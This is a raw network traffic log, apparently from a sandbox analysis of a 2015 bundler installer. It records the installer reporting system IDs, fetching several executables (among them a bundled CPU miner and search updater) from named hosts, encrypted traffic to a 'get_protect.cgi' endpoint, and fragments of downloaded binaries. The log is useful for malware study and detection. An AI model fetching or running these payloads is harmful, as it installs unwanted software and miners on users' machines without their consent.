POST /thankyou.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.downloadsoup.com

Content-Length: 460

Connection: Keep-Alive

Cache-Control: no-cache

cnt=6579010c2b8757be5b4951de6578f753&_srvlog=NSI &browser=un&capp=nsdummy&cid=12216&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=D6A6947B24975DB6AB9DE8B171C5FA6E&sysid1=D6A6947B24975DB6AB9DE8B171C5FA6E&te=1443221170&ts=1443221169&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempst25.tmp /ci 12216&bti1=

HTTP/1.1 200 OK

Content-Type: text/plain; charset=UTF-8

Date: Fri, 25 Sep 2015 22:46:09 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 14

Connection: keep-alive

.... ....

GET /setup_362.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: special-bundles.s3-website-us-east-1.amazonaws.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: vVxWZJdxxdgnQT708B9JU /SW1Q8fRusemKLJfLzEe5A4acvTkgRWcjTgq7awO0M

x-amz-request-id: 996B60BC172F4DF4

Date: Fri, 25 Sep 2015 22:46:35 GMT

Last-Modified: Wed, 10 Jun 2015 05:41:11 GMT

ETag: "0ccf900044e0e4edf36e89008e2c6aa7"

Content-Type: application/octet-stream

Content-Length: 254464

Server: AmazonS3

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R...R...R.......R....5..R....4..R...*...R...R...R....1..R.......R.......R..Rich.R..................PE..L...|.wU.................(...........4.......@....@..........................0............@.................................<...P....................................B...............................v..@............@...............................text...\&.......(.................. ..`.rdata..&m...@...n...,..............@..@.data....4..........................@....rsrc...............................@..@.reloc...'.......(..................@..B...........................................................................................................................................................................................................................................................................................................................................................BB...........U..V.....BB..o....E..t.V.E........^]............V..W...r...$......;.u.............s...tD.....9 .u1...v5..B...y. .u ...v$..B...y. .u....v...B...I. ...._...^._3.^................U..j.hI.B.d.....P..,...B.3..E.SVWP.E.d.......3..]....G.3..F......^..u..}..E.f...]..E.....;.......3..U............u..U..G..M....r.......f.<.=.........r.........4.V.a........u... t.../..........r........M.f...f.T].C....M....ux3...D}.Ph..B.3..|...f.D}.G...|..M..E.............E.f.U................E.........f.U.f.E.3.

<<< skipped >>>

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 115

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:00 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 126

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:00 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:00 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 177

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:01 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:01 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 190

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:11 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 181

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:11 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 194

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:22 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:22 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 183

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:24 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:24 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 196

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:34 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:34 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 199

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:35 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:35 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 212

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:45 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:45 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 189

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:46 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:46 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 202

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:57 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:57 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 199

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:45:57 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:57 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 212

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:46:07 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:07 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 187

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:46:08 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:08 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 200

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:46:18 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:18 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 199

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:46:23 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:23 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 212

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:46:33 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:33 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 197

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 22:46:35 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:35 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:33 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 22:46:00 GMT

Set-Cookie: _c4aid=D825CDAEEB1043FA9CB4972941EB3F13; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=D825CDAEEB1043FA9CB4972941EB3F13,1443221193.18008; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:25 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008913"

Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT

Cache-Control: max-age=40678

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443221126.dop005.fr7.t,1443221125.cds005.fr7.c

......."`...P.PB.............z.....R^z......cxT...x... ;K.....8..9i....|9..7...D..p[.2..!!.S.._.^..Z..W..8.@.'..\&!.!k...~..4.......f.V.u...0...^......,T;.....%......ch...F..c.........G.2../l.wr 1.&.?!..r.k.U....}%....w....}.2...}......oD.KX.G....p...s...$.W...c.Q.*<.4...Lz...@r.g;....~..w#..........`..@..m...){..$.......=z...J23..Bp....~.2.j.......pJ..X..C... .U.O5..h............._W...)#....:_lk.b.Z'..]..s0...6Y%..W........<...cP\Y..G.u.,U..B.og...8.C.~.8~..tj...t ....TT.-UQ....M.....1N-.x....P.p.#...wI..W...G.[.jO..Q.2.V1=..,/.......~..........."..Hma..se...^?.k....=...5...p.....I..G.hm. .vD....._...[.l...,.......s....O.....WU.v-:'.j..%...|....7.g...'..o1..._m.,.!.n.V.........Y5...}s<t..G.R3;R;8.....yP=.-.N...l{..r9..4.n&...U4..n..p.W....{d/l......*....!O*.j.}...%Q.....k.j..1=^.@G....!jI..5.....^7.O. ...DwR.....J/.@..4d."... ..$...#..........Xc.R>Vv.......;.d..C..W....'.....8 .*4Xw.drM.^...UE.C...]>.....ycA.... ....l..:..z..y....=I......9.........z.y......uX.... .T..........d-dj.7.d.!Q.qCqj.4.S{.&.".......s;..P.\.l..7...-OP....I...._\.YX2.6.Mb..._...5O.4....e..tyo...z.z.2.8..5........W..7......|.$............^..]..x...|...S...$....F.|_.SS......=...'...`rX....y...e.O..b...............U9hPfr..5KJ6;&.....d.d.......... .j....Wu.:...hk...a..s...]......?..T.]..8.cRN...........6..C=[.k....`......s]$.B, ....7;A......... ^.h~{..\:ybG.$..f.Q..l........#..FB.. ..........;.,RS.4].B-...N.EyNE...q.P_..g..}AY~_gz......42...%......Nx..D.D.!.]...[..o.1..&....."W.........nKK..).....<.x.@............?.m......c

<<< skipped >>>

POST /cgi-bin/get_protect.cgi HTTP/1.1

x-spidermessenger-crypted: 2

x-spidermessenger-crc32: 58628829

x-spidermessenger-length: 275

Content-Type: text/*

User-Agent: gmsd_re_005010096-gmsd_re_005010096

Host: prof.youandmeandmeandyouhihi.com

Content-Length: 410

Cache-Control: no-cache

ujXl2iaEv38K+/yRWyXC+m7rYR+qMqcsAaJIoxT54jOVrSF2+RX+r1ugkxX7buaKejfG1TigRcOM3yZsClNi6+RKQstPciC/856Qj+eW+2Ds/sNwgcHbBKQANmibrCwNctwli+4ICTc6ZT3YwpgdIfRwxf6SzzeH0ateAcYrqZZwH326OEHCeX5+J9UNFEMcNZU3jp5k9OHX+TR2f/04GM7fBuW9pzdyhJ+VnKlTo0gQiRYOeOCpF+fxP5w7qNMj+Cr4wnm/+cGOC0q1YAqLMyKzUA1+1TrKD1JSXiQ8EwOOFpKUddyWofCFCrpqOi31i0rkElNrjIR078Y3K1zexTVlkVN/ROvACVpowMuswPw=

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:30 GMT

Server: Apache/2.2.22

x-SPIDERMESSENGER-crypted: 2

x-SPIDERMESSENGER-length: 26780

x-SPIDERMESSENGER-crc32: -1

Set-Cookie: conftime=1443221190; expires=Wed, 19 Jan 16 16:33:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;

Set-Cookie: EoRezo=194.242.96.218.1443221190052851; path=/; expires=Sun, 25-Oct-15 22:46:30 GMT

Vary: Accept-Encoding

Connection: close

Transfer-Encoding: chunked

Content-Type: text/plain

8b8c..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pEI4yS2Vf5K1CwWkZ8xeq2FoHZiTq7fWERGyCAg88jpdmzVknJJbtdhSvgVLNEQZKmNKxPN3kfibTew3 ynOvjDhwwNX4fU19cLBEHf1q/Xj32GKoBkNDpFEvQc2RNtJ53wo0SzNY73Ov0OwqXrzI2YO2u8inUw0vzCREN1FLQCs72ck1KAXe9yjrUUOMG3q5g bq2QQatEZu6ZjmuvlhS8NPfmulr0/r2gbViyCGlmkK/Y6mz2jnp34PELZGdX7a7/3FbxPxvDNhkdb2Ix8lFg6G8IJZHOjZBpEqhB7EYYTy1F75DDgWmwZzwXaREMRyjejxsSQDFoLX2kKbPihkQX5Y8y/CXBDdrjNus0WjUra9Pa/zcgrEm7r94 DftChsiNYB6fppCwX o2v3MzwAVKVbyAKvLwDjcfvM40Nt4UCFp87iFCkirNyiyShQlgtRKr1IN77JviR6fBknbCopnu2k6lPjxOC0iHsH1OrICiia45/QGOnrbsotWXdARfOwlu6zXcRntUj3M hIOVgq84xcs/ct6zaSPa9zw1oXlKxbmdoft 4h/a3In6PaWHY15E0lbJ8vXHv400B7ycSX69szZkEQFt/edKmVJtx83bm8TavyR8hf5oa15R9hPQoPALN8GTJXbhLXmUqwzg9sZ6nCLvjPwC8AEp8MDaooPo7OTuM4eTHjVzEEIWQTVnsOws1pQWaYspJA1kAflC8CQhpM0meg4DhBwimdTQYxyOO67jyKrx2aNiolCAKmKCvmkmNpi6Hthz7xKH/vkPNR7EtpKtlu1HZkDN L/GVShTNTIxIlq3YG1CtI1Kgk EwGn7VH/AwzagZPU3ETblI rYGR40LGwWP0EHuXl/k/Qw 